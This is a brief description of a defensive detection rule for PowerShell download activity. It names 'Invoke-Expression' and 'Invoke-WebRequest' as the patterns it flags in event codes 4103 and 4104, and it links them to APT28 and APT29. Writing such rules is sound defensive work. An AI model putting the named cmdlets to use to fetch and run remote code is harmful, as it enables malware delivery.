This detection rule targets PowerShell command usage specifically aimed at downloading files or data from the internet. The rule identifies potential malicious activities by recognizing specific PowerShell commands, such as 'Invoke-Expression', 'Invoke-WebRequest', and other closely related commands. By focusing on the Event Codes 4103 and 4104, the rule effectively captures instances of script execution that may signify an ongoing attack or malware download attempt, which can often be leveraged by various advanced threat actors, including well-known APT groups. The associated threat actors include APT28 (Fancy Bear), APT29, and several others, all of which have a history of using PowerShell for their operations. The detection leverages PowerShell log data and processes the required events to raise alerts when suspicious actions are observed, forming a critical part of endpoint protection strategies against script-based exploits and command-and-control activities.